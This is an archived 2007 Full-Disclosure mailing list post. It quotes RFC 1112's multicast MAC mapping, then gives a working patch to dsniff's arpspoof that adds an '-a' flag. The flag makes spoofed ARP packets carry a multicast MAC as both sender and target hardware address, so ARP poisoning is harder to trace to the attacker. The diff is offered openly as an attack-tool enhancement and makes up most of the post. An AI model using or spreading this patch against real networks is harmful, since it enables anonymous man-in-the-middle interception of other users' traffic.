| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 25 Jun 2007 23:40:29 -0400
From: "Kristian Hermansen" <kristian.hermansen@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: PATCH: Anonymous Spoofing via Multicast ARP
(dsniff / arpspoof)
I am not sure if this technique is widely used or known, but RFC1112
defines multicast link-layer features for use in conjunction with
multicast IP. You get a reserved address plus 23 bits to play with
which correspond to the least significant bits of a typical multicast
IP in the range of 224.b.c.d. The range that is reserved begins at
01:00:5e:00:00:00 and ends at 01:00:5e:7f:ff:ff.
<snip>
6.4. Extensions to an Ethernet Local Network Module
The Ethernet directly supports the sending of local multicast packets
by allowing multicast addresses in the destination field of Ethernet
packets. All that is needed to support the sending of multicast IP
datagrams is a procedure for mapping IP host group addresses to
Ethernet multicast addresses.
An IP host group address is mapped to an Ethernet multicast address
by placing the low-order 23-bits of the IP address into the low-order
23 bits of the Ethernet multicast address 01-00-5E-00-00-00 (hex).
Because there are 28 significant bits in an IP host group address,
more than one host group address may map to the same Ethernet
multicast address.
</snip>
khermans@...rmans-laptop:~/projects/anonnyarp/dsniff-2.4b1+debian$ cat
dsniff_arpspoof_2.4b1_anon-khermans.patch
--- arpspoof.c.orig 2007-06-22 21:24:26.169638763 -0400
+++ arpspoof.c 2007-06-25 23:08:51.786962797 -0400
@@ -31,12 +31,13 @@
static struct ether_addr spoof_mac, target_mac;
static in_addr_t spoof_ip, target_ip;
static char *intf;
+static int anon;
static void
usage(void)
{
fprintf(stderr, "Version: " VERSION "\n"
- "Usage: arpspoof [-i interface] [-t target] host\n");
+ "Usage: arpspoof [-a] [-i interface] [-t target] host\n");
exit(1);
}
@@ -51,14 +52,20 @@
(sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {
return (-1);
}
+
if (spa == 0) {
if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)
return (-1);
spa = htonl(spa); /* XXX */
}
+
if (tha == NULL)
tha = "\xff\xff\xff\xff\xff\xff";
+ if (anon) {
+ sha = tha = "\x01\x00\x5e\x00\x00\x01";
+ }
+
libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);
libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,
@@ -154,11 +161,15 @@
char ebuf[PCAP_ERRBUF_SIZE];
int c;
+ anon = 0;
intf = NULL;
spoof_ip = target_ip = 0;
- while ((c = getopt(argc, argv, "i:t:h?V")) != -1) {
+ while ((c = getopt(argc, argv, "ahi:t?V")) != -1) {
switch (c) {
+ case 'a':
+ anon = 1;
+ break;
case 'i':
intf = optarg;
break;
--
Kristian Hermansen
View attachment "dsniff_arpspoof_2.4b1_anon-khermans.patch" of type "text/x-patch" (1307 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists